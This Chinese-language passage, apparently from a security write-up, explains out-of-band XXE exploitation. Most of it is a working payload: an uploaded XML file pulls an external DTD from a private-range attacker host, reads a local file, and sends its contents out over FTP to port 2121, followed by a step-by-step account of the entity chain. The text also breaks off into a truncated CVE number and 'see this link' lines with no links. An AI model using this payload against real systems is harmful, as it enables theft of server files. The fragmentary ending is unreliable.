通过ftp通道将数据传出来。上传1.xml
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://192.168.172.128:1234/ext.dtd"><!ENTITY % bbb SYSTEM "file:///E:///1.txt">%aaa;%ccc;%ddd;]>ext.dtd内容如下
<!ENTITY % ccc "<!ENTITY % ddd SYSTEM 'ftp://fakeuser:@192.168.172.128:2121/%bbb;'>">看下获取数据流程:
1.xml执行顺序%aaa 获取服务器上的ext.dtd,%bbb获取敏感数据,%ccc赋值为<!ENTITY % ddd SYSTEM 'ftp://fakeuser:@192.168.172.128:2121/%bbb;'>
通过ddd将获取到敏感的数据通过ftp传到服务器的2121端口。
CVE-2018-24
文件上传直接参加这篇文章链接吧,,给出文件上传截图
参考这个链接: